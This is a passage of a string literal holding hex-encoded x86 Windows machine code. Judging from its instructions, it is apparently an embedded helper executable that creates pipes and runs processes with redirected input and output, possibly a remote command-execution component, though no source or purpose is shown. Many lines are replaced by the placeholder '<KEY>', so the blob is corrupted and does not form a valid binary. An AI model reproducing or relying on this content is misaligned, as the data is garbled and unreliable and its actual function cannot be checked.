'c8015dc204006805400080e8d6070000cc558bec8b450c53c1e80456400fb' \
'<KEY>' \
'00008bf05985f6745f570fb73e578bcbe8e40500000fb70e83c6028945088' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'0e8b42043b1075048930eb0389700889168972045e5dc20400558bec8b550' \
'8568b328b460889028b460880780d0075038950048b42048946048b013b50' \
'047505897004eb0f8b42043b50087505897008eb0289308956088972045e5' \
'dc204006a18e85ead00005985c00f84d4a600008d4804890085c974028901' \
'8d480885c97402890166c7400c0101c36a10b8f28a4100e8c2da0000894de' \
'433db895dfc8b39b0018b77048845ec807e0d00753a8bfe84db74148b4510' \
'8d4e10ff30e816feffff85c00f99c0eb10ff76108b4d10e804feffff85c00' \
'f98c08845ec84c074048b36ebc58b7608ebc08bf78975e884c074398b4de4' \
'8b013b387525ff75148d4510ff7510576a0150e8990000008b088b4508890' \
'8c6400401e8b0d90000c210008d4de8e83a0000008b75e88b45108d4e10ff' \
'30e8a0fdffff85c07912ff75148b4de4ff75108d45e857ff75ecebb98b450' \
'88930885804ebc033db5353e811d90000cc8b11807a0d0074058b4208eb15' \
'<KEY>' \
'b89118b5204807a0d0074ef8b0180780d00750289118bc1c3558bec535657' \
'<KEY>' \
'08943048b0f3bc1750e8959048b0789188b07895808eb1f807d0c00740c89' \
'188b0f3b0175118919eb0d8958088b0f3b410875038959088b43048bf3e99' \
'30000008b46048b50048b0a3bc175388b4a0880790c0074353b7008750a8b' \
'<KEY>' \
'4ff7004e8cdfdffffeb4c80790c00751ac6400c01c6410c018b46048b4004' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'0f84100e8aea40000cc6a10b8d78a4100e885d80000e8630000008bf833c9' \
'<KEY>' \
'b0b83e910e83603000083c0108906c645fc028b4b0483e910e82203000083' \
'c0108946048bc7e8a7d70000c20400ff75ece8fda400005933c95151e837d' \
'70000cc566a188bf1e87faa00008bd05985d2741e8b068d4a04890285c974' \
'048b0689018d4a0885c974048b0689018bc25ec3e8d4a30000ccc3558bec8' \
'<KEY>' \
'000780eb0e680e000780eb075dc36805400080e847030000cc558bec53578' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'd28b06578d48f08b39395104742739510c7d113950f87c208950f48b0633c' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'fc017e0a568bcfe843ffffffeb2d8b49f83bce7d2681f9000000407e0881c' \
'100001000eb098bc1992bc2d1f803c83bce0f4cce518bcfe878ffffff5f5e' \
'<KEY>' \
'bc87d08528bcee884ffffff8b065e5dc204006857000780e879010000cc55' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'3c4108bcf53e85cffffff5f5bc9c208006857000780e8c4000000cc680e00' \
'0780e8b9000000cc568bf1578b0e8b01ff50108d560c8bc8833a007c0f3b0' \
'e750b33c08bfe40f00fc102eb318b016a02ff7604ff108bf885ff74278b46' \
'048947048b46048d0c4502000000518d461050518d471050e8e4a3000083c' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'0983e910e941000000558bec8b450889450868603142008d450850e868d30' \
'<KEY>' \
'<KEY>' \
'88b0e568b01ff50045ec36a30b8578c4100e894d300008bfa8bd933c04050' \
'8945ec8d45c450ff1558a041006a006a006a018d45c450ff155ca04100836' \
'5dc008365e0008d45c468006042008d4df0c745d80c0000008945dcc745e0' \
'01000000e861ffffffff75088365fc00578d45e868c4f8410050e8378f000' \
'083c410508d4df0c645fc01e8cbfeffffc645fc008b4de88d49f0e855ffff' \
'ff8b35bca041008d45d8506aff33c0505068ff000000506a02ff75f0ffd68' \
'98390000000ff15c0a041008b8b900000008945e883f9ff740485c97531ff' \
'75f08d45e468f8f8410050e8cc8e000083c40cc645fc028b55e88b08e88f9' \
'00000c645fc008b4de48d49f0e8e9feffffff75088d45e457683cf9410050' \
'e89a8e000083c410508d4df0c645fc03e82efeffffc645fc008b4de48d49f' \
'0e8b8feffff8d45d8506aff33c0505068ff000000506a02ff75f0ffd68983' \
'98000000ff15c0a041008b8b980000008bf083f9ff740485c97530ff75f08' \
'd45e468f8f8410050e8368e000083c40cc645fc048b088bd6e8fa8f0000c6' \
'45fc008b4de48d49f0e854feffffff75088d45e457686cf9410050e8058e0' \
'00083c410508d4df0c645fc05e899fdffffc645fc008b4de48d49f0e823fe' \
'ffff8b75f08d45d8506aff33c0505068ff000000506a0156ff15bca041008' \
'98394000000ff15c0a041008b8b940000008bf883f9ff740485c9752e568d' \
'45e468f8f8410050e89e8d000083c40cc645fc068b088bd7e8628f0000c64' \
'5fc008b4de48d49f0e8bcfdffff8b839000000083f8ff744f85c0744b8b8b' \
'9800000083f9ff744085c9743c8b8b9400000083f9ff743185c9742d8b3dc' \
'8a041006a0050ffd76a00ffb398000000ffd76a00ffb394000000ffd732d2' \
'b9e0f94100e86e8f0000eb3d8b3dc4a0410050ffd7ffb398000000ffd7ffb' \
'394000000ffd733c0b201b998f94100898390000000898398000000898394' \
'000000e8338f0000c645ec008d4ef0e81dfdffff8a45ece8aed00000c3558' \
'bec81ec50010000a16063420033c58945fc53568b75086af5ff15cca04100' \
'33db68ff0000008985d0feffff8d85fdfeffff5350889dfcfeffffe87ac70' \
'00083c40c899ddcfeffff53536a0153ff15d0a04100803d32804200008bd8' \
'899dd8feffff0f857f0100005783a5b0feffff0033c08dbdb4feffffababa' \
'bab8d85b0feffff508d85dcfeffff5068ff0000008d85fcfeffff508b0689' \
'9dc0feffffffb090000000ff15d4a0410085c0740983bddcfeffff007511f' \
'f15c0a041003de80000000f841e010000803d32804200000f85110100008b' \
'46106aff8985c8feffff6a008d85c8feffff506a02899dccfeffffff15d8a' \
'0410085c00f84e700000080bdfcfeffff0c0f84fe0000008b85dcfeffff3d' \
'000100000f8360010000803d3280420000c68405fcfeffff000f85b400000' \
'08d461850ff15e8a041008b463032ffeb3e8378141072048b08eb028bc88d' \
'95fcfeffff8a1a3a19751a84db74128a5a013a5901750e83c20283c10284d' \
'b75e433c9eb051bc983c90185c9740a83c01839463475bdeb12508d85c4fe' \
'ffff508d4e30b701e8840800008d461850ff15eca0410084ff752b8d85fcf' \
'effff506820fa4100e8f6a5000083c02050e841a40000e8e8a5000083c020' \
'50e86ea7000083c4108b9dd8feffff803d32804200000f8483feffff5f53f' \
'f15c4a041008d461450ff15f0a041008b4dfc5e33cd33c05be80c9c0000c9' \
'c2040083a5d4feffff0033c0668985e4feffff8985e0feffff8dbde6fefff' \
'fababababab8bbdd0feffff8d85e4feffff5057ff15dca0410085c074960f' \
'bf8de6feffff8d85d4feffff500fbf85e4feffffffb5e0feffff0fafc8516' \
'a2057ff15e0a04100ffb5e0feffff57ff15e4a04100e95cffffffe8a7a200' \
'00cc558bec81ec24010000a16063420033c58945fc53568b750833c050506' \
'a0150ff15d0a04100803d32804200008bd80f85e30000005783a5dcfeffff' \
'0033c08dbde0feffffabababab8d85dcfeffff508d85f8feffff506800010' \
'0008d85fcfeffff508b06899decfeffffffb098000000ff15d4a0410085c0' \
'740983bdf8feffff007511ff15c0a041003de80000000f8482000000803d3' \
'28042000075798b46108985f0feffff8b85ecfeffff6aff8985f4feffff6a' \
'008d85f0feffff506a02ff15d8a0410085c0744d8b85f8feffff3d0001000' \
'07364c68405fcfeffff008d85fcfeffff506820fa4100e83da4000083c040' \
'50e888a20000e82fa4000083c04050e8b5a5000083c410803d32804200000' \
'f841fffffff5f53ff15c4a041008d461450ff15f0a041008b4dfc5e33cd33' \
'c05be8599a0000c9c20400e867a10000cc558bec83e4f86aff687d8c41006' \
'4a1000000005081ec58010000a16063420033c489842450010000535657a1' \
'6063420033c4508d84246801000064a3000000008b75086af6ff15cca0410' \
'068ff0000008bd88d4424616a0050c644246800e893c3000083c40c33c951' \
'33c051405051894c2424894c2434ff15d0a0410083642420008944241c8d4' \
'424205053ff15f4a041006a0053ff15f8a0410033c94133d20fb6c983f8ff' \
'0f45ca894c24183815328042000f855d01000084c97426eb1b6a00ff7610f' \
'f15fca0410085c00f84440100006a64ff1500a14100e882a6000085c074dc' \
'83642414006a008d4424185068000100008d4424685053ff15d4a0410085c' \
'07511ff15c0a041003de80000000f8401010000803d32804200000f85f400' \
'0000807c24180074598d7e1857ff15e8a041008b4424143d000100000f83c' \
'9000000c644045c008d44245c508d4c2448e84d0b000083a4247001000000' \
'8d442444508d4e30e86a040000838c2470010000ff8d4c2444e8190700005' \
'7ff15eca04100836424300033c08d7c2434abababab8b44241c894424408d' \
'442430508d44242850ff74241c8d442468508b06ffb094000000ff1504a14' \
'10085c07452803d3280420000754f8b4610894424288b4424406aff894424' \
'306a008d442430506a02ff15d8a0410085c0742b8b06ffb094000000ff150' \
'8a14100803d328042000075148b4c2418e9aefeffffe8569f0000ff15c0a0' \
'4100ff74241cff15c4a04100ff74242053ff150ca141008d461450ff15f0a' \
'0410033c08b8c246801000064890d00000000595f5e5b8b8c245001000033' \
'cce8f89700008be55dc204006a3cb8048c4100e8a3ca00008bd9895df033c' \
'040508945e48d45b850c745ec0a000000ff1558a0410033ff575733f64656' \
'8d45b850ff155ca04100ff730c8d45b8ff7308897dd0ff73048945d08d45e' \
'06824fa4100897dd450c745cc0c0000008975d4e84e860000897dfcff730c' \
'8d45dcff7308ff73046854fa410050e834860000c645fc01ff730c8d45d8f' \
'f7308ff73046884fa410050e81986000083c43cc645fc028b75e08b7ddc8b' \
'5dd8e9290100008b4dec8bc149894dec85c00f84250100008b45f08b008b8' \
'09000000083f8ff740485c075396a0056ff1510a1410085c0742c6a006880' \
'0000006a038d45cc506a00680000008056ff1514a141008b55f08b0a89819' \
'0000000ff15c0a041008b45f08b008b809800000083f8ff740485c075336a' \
'0057ff1510a1410085c074266a0068800000006a038d45cc506a006800000' \
'08057ff1514a141008b55f08b0a8981980000008b45f08b008b8094000000' \
'83f8ff740485c075336a0053ff1510a1410085c074266a0068800000006a0' \
'38d45cc506a00680000004053ff1514a141008b55f08b0a8981940000008b' \
'45f08b008b889800000083f9ff742285c9741e8b889400000083f9ff74138' \
'5c9740f8b809000000083f8ff740485c0751868e8030000ff1500a1410080' \
'3d32804200000f84cafeffff8b45f08b088b919800000083faff0f84e2000' \
'00085d20f84da0000008b919400000083faff0f84cb00000085d20f84c300' \
'00008b899000000083f9ff0f84b400000085c90f84ac0000006a00ff7010f' \
'f15fca0410085c00f8496000000803d32804200000f85000100008b45f083' \
'c01450ff1518a141008d45e85033c050ff75f068462240005050e858aa000' \
'083c41850ff15c4a041008b45f083c01450ff1518a141008d45e85033c050' \
'ff75f068ca2440005050e82baa000083c41850ff15c4a041008b45f083c01' \
'450ff1518a141008d45e85033c050ff75f0680a2640005050e8fea9000083' \
'c41850ff15c4a04100eb7b8b45f0803d3280420000756b6a00ff7010ff15f' \
'ca0410085c0745c8b45f08b00ffb098000000ff15c4a041008b55f08b02ff' \
'b094000000ff15c4a041008b4df08b01ffb090000000ff15c4a041008b4df' \
'033d28b018990980000008b018990940000008b01b9b4fa41008990900000' \
'00b201e8ab8500008365e4008d4bf0e895f3ffff8d4ff0e88df3ffff8d4ef' \
'0e885f3ffff8b45e4e816c70000c3558bec568bf1578b4e048b7d083bf973' \
'44393e77402b3e538bc76a18995bf7fb8bf83b4e087508518bcee8d700000' \
'08b4e046bff18033e85c9741483611000c741140f00000057c60100e82302' \
'0000015e045beb2c3b4e087508518bcee8a40000008b4e0485c9741483611' \
'000c741140f00000057c60100e8f5010000834604185f5e5dc20400558bec' \
'<KEY>' \
'208ff36e8c59300005983661000c746140f000000578bcec60600e8aa0100' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'558bec568b750857837e14108bf973138b4610407418505657e882a000008' \
'<KEY>' \
'00c746140f0000005fc606005e5dc20400568bf1837e14107208ff36e8a69' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'141089411072048b11eb028bd1c60402008bc15dc204006800fb4100e8a19' \
'<KEY>' \
'15837e1410894e1072048b06eb028bc6c6040800eb3e85d2743a837e14107' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'ee847ffffffeb476a0057e8c701000084c0743b837b141072028b1b837e14' \
'1072048b0eeb028bce85ff74108b450c5703c35051e87bba000083c40c837' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'75e88b7d0883cf0f83fffe76058b7d08eb2a33d28bc7c745ec03000000f77' \
'<KEY>' \
'db8d47015350895dfce87fffffff59598bc88945eceb2f8b45088965f0894' \
'508406a0050c645fc02e860ffffff598945ec59b8ea304000c38b4dec8b75' \
'<KEY>' \
'40b505251e879b9000083c40c837e14107208ff36e82d8f0000598b45ec89' \
'068b450c897e1489461083ff1072028b36881c06e8aec10000c208008b75e' \
'8837e14107208ff36e8fc8e00005933db53c746140f000000895e1053881e' \
'<KEY>' \
'e85ff740b575356e8fcb8000083c40c53e8b78e0000595b897e10c746140f' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'f1e899fcffff84c0741c837e141072048b06eb028bc6ff750c2bd853568bc' \
'ee867fdffffeb43578b7d0c6a00578bcee85fffffff84c0742e837e141072' \
'048b06eb028bc685ff740b575350e820b8000083c40c837e1410897e10720' \
'<KEY>' \
'<KEY>' \
'0c746140f000000c60600e8c7ffffff5950ff75088bcee842ffffff8bc65e' \
'<KEY>' \
'3536a026a006800000002885f08ffb688000000ff156ca0410085c07417ff' \
'b688000000ff15c4a041008b45f0898688000000eb0d6a535ab928fb4100e' \
'8323500008b8688000000894704837e14ff8b45088945ec7530e8b3000000' \
'508945ec8d45086840fb410050e8ba7b000083c40c8365fc008b0832d2e8f' \
'17d0000834dfcff8b4d08eb25508d45e86894fb410050e8927b000083c40c' \
'895dfc8b0832d2e8ca7d0000834dfcff8b4de88d49f0e8b1ebffff8365e40' \
'08d45e4506a04576a0cffb688000000ff1564a041008b9688000000b9d4fb' \
'4100e8ce7f00006a048d45ec506a0cffb688000000ff1560a0410085c0751' \
'2ff15c0a041008bd0b9f8fb4100e8f57c00008bc3e8f0be0000c3558bec51' \
'5156578d45fc508d45f85033ff6a0157578bf7897dfcff1594a2410085c07' \
'4248b4dfc85c974108b45f839780875028b3083c00c4975f3ff75f8ff1598' \
'a2410085f67546a12880420085c075396838fc4100ff1528a1410085c0741' \
'36854fc410050ff15a4a04100a328804200eb05a12880420085c0750e32d2' \
'b978fc4100e8d87c0000eb04ffd08bf05f8bc65ec9c3558bec83e4f86aff6' \
'8958f410064a1000000005081ece8000000535657a16063420033c4508d84' \
'24f800000064a30000000083642414006a01b301681d3f4000885c2422ff1' \
'534a1410051518d4c242ce813dbffff83a42400010000008b3d38a14100ff' \
'd7508d4c2428e89edbffff68e4fc41008d442414508d4c242ce831dfffff8' \
'b4424103b44242c74108d4c2424e8917600008bf0e9770600008d4c244ce8' \
'5b1a000068f4fc41008d442414508d4c242cc684240801000001e8f3defff' \
'f8b4424103b44242c740fc684248900000001c6053080420001befcfc4100' \
'568d442414508d4c242ce8c6deffff8b4424103b44242c744c568d4c2428e' \
'841dfffff8bf08bcee83ee2ffff50568d8c24e0000000e81ce8ffff8d8424' \
'd800000050b974804200e8ffe8ffff8b8424d80000008378f400750cb201b' \
'904fd4100e8897b0000e882060000ffd78bd08d4c244ce8ad20000083cfff' \
'84c00f8409050000803d3280420000740dc7442414f5ffffffe9520500008' \
'bb424bc0000008b8424c00000003bc60f8547010000807c2470007506397c' \
'246074496828fd41008d4c2414e8c1deffff8d442410508d8c24c0000000c' \
'684240401000002e8730d0000c6842400010000018b4c24108d49f0e8eee8' \
'ffff8b8424c00000008bb424bc0000003bc60f85e900000033d28d4c244ce' \
'83136000084c00f84bc000000807c245b00756e8b8424b400000069c0e803' \
'000085c00f44c750ffb424cc000000ff15fca0410085c074363d020100007' \
'414ff15c0a041008bd0b9a8fd4100e8187a0000eb1bb201b930fd4100e87d' \
'7a00006af6ffb424cc000000ff153ca141008d44241450ffb424cc000000f' \
'f1540a14100eb4fffb424cc0000008d442414ffb4248400000068f4fd4100' \
'50e8f677000083c410c6842400010000038b0832d2e8297a0000c68424000' \
'10000018b4c24108d49f0e80be8ffffeb08c7442414fdffffffffb424c800' \
'0000ff15c4a04100e9b2030000803d32804200000f858303000033c089842' \
'4e8000000898424c8000000898424cc000000898424e4000000898424e000' \
'0000898424dc0000008b0e8bdf83e910895c241c8844241be8a9e6ffff8d7' \
'810897c24106828fd41008d4c2414c684240401000004e829dfffff85c075' \
'146a0e6830fe41008d4c2418e8e3e5ffff8b7c2410578d4424406850fe410' \
'050e82077000083c40cc6842400010000058b0832d2e853790000c6842400' \
'010000048b4c243c8d49f0e835e7ffff6a00e86fa0000059895424388b168' \
'd4c244c89442444e8b648000084c0750dc7442414fcffffffe981010000ff' \
'7424388b0eff7424488d542454e8e9060000595984c0740dc7442414fbfff' \
'fffe95b010000578d4424446880fe410050e89676000083c40cc684240001' \
'0000068b0832d2e8c9780000c6842400010000048b4c24408d49f0e8abe6f' \
'fff8b0e8d54244ce8e94c000084c0750dc7442414faffffffe9070100008d' \
'44241b508d442420c68424ef000000018b0e508d542454e8d64f000059598' \
'4c0750dc7442414f9ffffffe9d3000000807c241b000f84a50000008b8424' \
'a00000008b8c249c0000002bc16a1c995bf7fb83f8017533ff318d44244c6' \
'8c4fe410050e8eb75000083c40cc6842400010000078b0832d2e81e780000' \
'c6842400010000048b4c2448eb30508d44242468f4fe410050e8b97500008' \
'3c40cc6842400010000088b0832d2e8ec770000c6842400010000048b4c24' \
'208d49f0e8cee5ffff8b0e8d44241c508d542450e8db5700005984c0750ac' \
'7442414f8ffffffeb2332d2b930014200e8ad7700008b0e8d442414508d44' \
'2420508d542454e81e55000059598b5c241c80bc24eb00000000740b8b0e8' \
'd54244ce8ee49000080bc24ea00000000740b8b0e8d54244ce8b144000080' \
'bc24e80000000074148b166a006830ff41008d4c2454e819400000595980b' \
'c24e90000000074148b166a006840ff41008d4c2454e8fb3f00005959803d' \
'32804200000f858b00000083fbff740b85db740753ff15c4a041008b8424c' \
'800000083cbff3bc3741385c0740f50ff15c4a0410083a424c8000000008b' \
'8424e40000003bc3741385c0740f50ff15c4a0410083a424e4000000008b8' \
'424e00000003bc3741385c0740f50ff15c4a0410083a424e0000000008b84' \
'24dc0000003bc3741385c0740f50ff15c4a0410083a424dc000000008d4ff' \
'0c684240001000001e87ae4ffff83c6046aff5f39b424c00000000f8578fc' \
'ffff8a5c241a0bffeb228a5c241aeb1c803d32804200000f85f3faffffe87' \
'202000032dbc7442414feffffff8b8424d00000003bc7741a85c0741650ff' \
'b424d8000000ff157ca2410083a424d0000000008b8424d40000003bc7741' \
'385c0740f50ff15c4a0410083a424d400000000c605328042000184db7433' \
'ff7424148d4424246850ff410050e89f73000083c40cc6842400010000098' \
'b0832d2e8d27500008b4c24208d49f0e8bce3ffff8b7424148d4c244ce821' \
'0000008d4c2424e8c1d4ffff8bc68b8c24f800000064890d00000000595f5' \
'e5b8be55dc356578bf16a108b8e8c0000005f2bcfe87ae3ffff8d4e70e879' \
'1300008d4e5ce83d1300008d4e50e8351300008b4e4c2bcfe858e3ffff8b4' \
'e482bcfe84ee3ffff8b4e402bcfe844e3ffff8b4e382bcfe83ae3ffff8b4e' \
'342bcfe830e3ffff8b4e282bcfe826e3ffff8b4e202bcfe81ce3ffff8b4e1' \
'c2bcfe812e3ffff833e007412ff36e80084000033c0598906894604894608' \
'5f5ec36838080000b8da8d4100e8d8b6000068006042008d8dc8f7ffffe8b' \
'0e2ffff68100400008d85d0f7ffff33db5053895dfcff1544a1410085c00f' \
'84a00000008d85c0f7ffff508d85d0f7ffff50ff1588a241008bf08d4e015' \
'1e837830000598bf85756538d85d0f7ffff50ff1584a2410085c074638d85' \
'<KEY>' \
'4f7ffff0fb74108500fb7410a508d85ccf7ffff6894ff410050e807720000' \
'83c410508d8dc8f7ffffc645fc01e898e1ffff885dfc8b8dccf7ffff8d49f' \
'0e820e2ffff57e8aa9b0000598bb5c8f7ffff568d85ccf7ffff68a8ff4100' \
'50e8c471000083c40cc645fc028b0832d2e8fb7300008b8dccf7ffff8d49f' \
'0e8e3e1ffff8d4ef0e8dbe1ffffe883b50000c353565768840042006a6533' \
'db53ff15b4a041008bf05653ff15a8a0410056538bf8ff15b0a041008d4f0' \
'1518bf0e84082000059568bd8ff15aca04100575053e8c7ac0000be900042' \
'0056c6043b00e82c9b000053e8269b000056e8209b000053e8009b000083c' \
'<KEY>' \
'000080ff7704ff1514a141008b35c0a041008bd8ffd683fbff0f84df00000' \
'085db0f84d70000008365bc006a308d45c06a0050e8beab000083c40c8d45' \
'bc5053ff1548a1410085c0753cffd6ff77048bf08d45b0689800420050e8b' \
'470000083c40c8365fc008b088bd6e8787200008b45b08d48f0e8d6e0ffff' \
'53ff15c4a04100e9850000008b45d08947088b45d45389470cff15c4a0410' \
'08d45ac50ff7704ff1588a241008bf08d460150e83c810000598bd8535633' \
'f656ff7704ff1584a2410085c0742d8d45b4508d45b850682c01420053897' \
'5b88975b4ff158ca2410085c0740f8b55b88b4a0c894f148b4a2c894f1053' \
'e8e799000059b001eb0f803d33804200007404c647180132c0e8ebb30000c' \
'3558bec8b450883f802760c83c0fb83f801760433c0eb1568dc004200e8c6' \
'99000033c059c6053280420001405dc204006a04b8ae914100e8bdb300008' \
'bf28bf9837e6c0074456a00e8319900002b4508591b550c78357f053b466c' \
'762e578d45f068ec00420050e8946f000083c40c8365fc008b08b201e8cb7' \
'100008b4df083c1f0e8b6dfffffb001eb0232c0e844b30000c36858080000' \
'b8678e4100e88ab3000033db8bf389b5b8f7ffff8d41488d515089b5c4f7f' \
'fffc685c0f7ffff018985bcf7ffff8995b4f7ffff381d3380420074128d41' \
'4c8d515c8985bcf7ffff8995b4f7ffff899d9cf7ffff899da0f7ffff899da' \
'4f7ffff895dfc8b3a397a040f841e0300008b0883e910e835deffff83c010' \
'8985c8f7ffffc645fc018378f400743d518d85acf7ffff508d8dc8f7ffffe' \
'807030000c645fc0283ce01682c0142008bc889b5c4f7ffff89b5b8f7ffff' \
'e88dd6ffffc685cff7ffff0185c07506889dcff7ffffc745fc010000008b8' \
'5c4f7ffffa80174178b8dacf7ffff83e0fe8d49f08985c4f7ffffe8b0deff' \
'ff80bdcff7ffff0074126a01682c0142008d8dc8f7ffffe8800400008b078' \
'd8dc8f7ffffff70f450e86f04000033c0681e080000668985d0f7ffff8d85' \
'd2f7ffff5350e80fa900008bb5c8f7ffff83c40c8d85d0f7ffff681004000' \
'05056ff154ca141008d8dd0f7ffff8d5102668b0183c102663bc375f52bca' \
'd1f97419518d85d0f7ffff508d8dc8f7ffffe892dcffff8bb5c8f7ffff535' \
'6e869980000595985c074568bd68d8da8f7ffffe820760000508d8dc8f7ff' \
'ffc645fc03e857ddffffc645fc018b8da8f7ffff8d49f0e8deddffff8bb5c' \
'8f7ffff5356e82798000059598b8dc0f7ffff0fb6c933d285c00f45ca898d' \
'c0f7ffffeb068b8dc0f7ffff8b85b4f7ffff39380f853901000084c9750c3' \
'80d338042000f846f0100008b85bcf7ffff8b008378f4000f85170100006a' \
'5c585056e87f98000059598985b8f7ffff85c0742233c96689088b8dbcf7f' \
'fff56e84cd3ffff8b85b8f7ffff6a5c59668908e9df0000008bb5bcf7ffff' \
'b80401000050508bcee844dbffff50ff1550a141006aff8bcee86a0100005' \
'68d8dc8f7ffffe880dcffff8b85c8f7ffff8378f4007443518d85b0f7ffff' \
'508d8dc8f7ffffe8f9000000c645fc048bb5c4f7ffff83ce02682c0142008' \
'bc889b5c4f7ffff89b5b8f7ffffe879d4ffffc685cff7ffff0185c0750688' \
'9dcff7ffffc745fc010000008b85c4f7ffffa80274178b8db0f7ffff83e0f' \
'd8d49f08985c4f7ffffe89cdcffff80bdcff7ffff0074126a01682c014200' \
'8d8dc8f7ffffe86c0200008b078d8dc8f7ffffff70f450e85b0200008bb5c' \
'8f7ffff8d85c8f7ffff508d4f04e8c2dbffff8bcfe8ebfaffff2085c0f7ff' \
'<KEY>' \
'fff8b85bcf7ffffe9ecfcffff8d4ef0e81cdcffffeb068a9dc0f7ffff8d8d' \
'9cf7ffffe8100c00008ac3e8afaf0000c3558bec518365fc00568b31578b7' \
'ef483ff017f128d4ef0e8ecdaffff8d48108b45088908eb1ae8920000008b' \
'4d08508d46fe6a018d047850e84cd2ffff8b45085f5ec9c20800558bec8b4' \
'<KEY>' \
'<KEY>' \
'b3ec1ff023b4608750651e84a0000008b068d04b850eb0c3b4608750651e8' \
'3700000057ff7604e8c8010000834604045f5e5dc204008b018b48f085c97' \
'4078b01ff5010eb0233c085c0750db900604200a100604200ff6010c38b51' \
'08568b71048bc22bc6c1f80283f80173362b3157bfffffff3fc1fe028bc72' \
'<KEY>' \
'd60f42d652e80f0000005ec2040068ecfa4100e80a7b0000cc6a0cb8ba8e4' \
'<KEY>' \
'50e82f8100008bf0598975ec85f67505e89f7a00008365fc00ff75088b570' \
'<KEY>' \
'e885db741e3bd974128b0b83e910e854daffff83c3043b5dec75eeff37e83' \
'f7b0000598b450889378d04868947088b45e88d0486894704e8c4ad0000c2' \
'0400ff75ece81a7b0000596a006a00e854ad0000cc558bec5153568bd1578' \
'b7d088b028bf72bf08b40f4d1fe837d0c008955fc8945087c6185ff750433' \
'<KEY>' \
'<KEY>' \
'518d045050e8e37c00008b4dfc83c410ff750ce8dfd7ffff5f5e5bc9c2080' \
'06857000780e846d9ffffcc6a04b8438d4100e836ad00008b75088975f083' \
'65fc0085f674128b450c8b0883e910e866d8ffff83c0108906e8eeac0000c' \
'<KEY>' \
'74325756e8a7ffffff83c60489750883c704ebea8b75eceb0d8b0e83e910e' \
'813d9ffff83c6043b750875ee6a006a00e840ac00008bc6e894ac0000c355' \
'8bec538b5d085633f6578bf985db741881fbffffff7f77538d041b50e8697' \
'f00008bf05985f674438b47042b0783e0fe50ff3756e8568800008b47042b' \
'0783c40cd1f8833f008945087408ff37e8a1790000598d045e8947088b450' \
'<KEY>' \
'2bc6d1f883f80173342b3157bfffffff7fd1fe8bc72bc683f80172252b114' \
'<KEY>' \
'<KEY>' \
'322393e771e2b3ed1ff3b4608750651e887ffffff8b4e0485c974208b0666' \
'8b0478eb153b4608750651e86dffffff8b4e0485c97406668b07668901834' \
'604025f5e5dc204005657bf00604200578bf1e8a6d7ffff578d4e04e89dd7' \
'ffff33c088461889461089461489460c8946085f8bc65ec36a0cb81a8d410' \
'<KEY>' \
'85f67408578bcee85d01000083c61cc645fc0089750883c71cebda8b75ece' \
'<KEY>' \
'0000c36a10b8d58e4100e864ab00008bd98b750833ff897de885f6742281f' \
'e4992240977158bc66bc01c50e8af7d00008bf859897de885ff7505e81f77' \
'00008365fc00ff75088b530451518b0b57e84bffffff8b43048b0b8945e82' \
'bc199c745081c000000f77d0883c410894dec8945e485c97420eb0ee8aacb' \
'ffff8b4dec034d08894dec3b4de875edff33e8b77700008b45e4596bf61c6' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'1508bcee8e8feffff5f5e5bc2040068ecfa4100e864760000cc6a04b8718d' \
'4100e8d2a900008bd9895df0bf0060420057e8ddd5ffff8365fc00578d4b0' \
'4e8d0d5ffff8b7d08578bcbc645fc01e851d5ffff8d4704508d4b04e845d5' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'5feffff8b4e046bff1c033e894d08894df08365fc0085c9740657e843ffff' \
'ff015e04eb2b3b4e087508518bcee8c7feffff8b4e04894d08894df0c745f' \
'c0100000085c9740657e817ffffff8346041ce8c9a80000c204006a24b89f' \
'8e4100e8dda800008bf9897df0807d0c000f84010200008b5d086a018bcbe' \
'8fd6a00008b47042b078bcbd1f850e8ee6a00008b37eb0c0fb70650e8e16a' \
'000083c6028bcb39770475ed0fb6470c50e8aa6a00000fb6470d508bcbe89' \
'e6a00000fb6470e508bcbe8926a00000fb6470f508bcbe8866a00000fb647' \
'10508bcbe87a6a0000ff77148bcbe8936a00000fb64718508bcbe8646a000' \
'00fb64719508bcbe8586a00000fb6471a508bcbe84c6a0000ff771c8bcbe8' \
'e9690000ff77208bcbe8df6900000fb64724508bcbe82c6a0000ff77288bc' \
'be8c96900000fb6472c508bcbe8166a0000ff77308bcbe82f6a0000ff7734' \
'8bcbe8a9690000ff77388bcbe89f6900000fb6473c508bcbe8ec6900000fb' \
'6473d508bcbe8e0690000ff77408bcbe87d6900000fb64744508bcbe8ca69' \
'0000ff77488bcbe867690000ff774c8bcbe85d6900008b47542b47506a1c5' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'cee8b269000083650c008d450c508bcee8a36900008b5d0c85db742483650' \
'8008d4508508bcee88d6900000fb745088945088d4508508bcfe894faffff' \
'4b75dc8d470c508bcee8406900008d470d508bcee8356900008d470e508bc' \
'ee82a6900008d470f508bcee81f6900008d4710508bcee8146900008d4714' \
'508bcee8366900008d4718508bcee8fe6800008d4719508bcee8f36800008' \
'd471a508bcee8e86800008d471c508bcee8706800008d4720508bcee86568' \
'00008d4724508bcee8c76800008d4728508bcee84f6800008d472c508bcee' \
'8b16800008d4730508bcee8d36800008d4734508bcee82e6800008d473850' \
'8bcee8236800008d473c508bcee8856800008d473d508bcee87a6800008d4' \
'740508bcee8026800008d4744508bcee8646800008d4748508bcee8ec6700' \
'008d474c508bcee8e16700008d450c508bcee870680000837d0c00766d8d5' \
'f508b7d0c8d4dd0e8caf9ffff8365fc008d45d0508bcee8b36700008d45d8' \
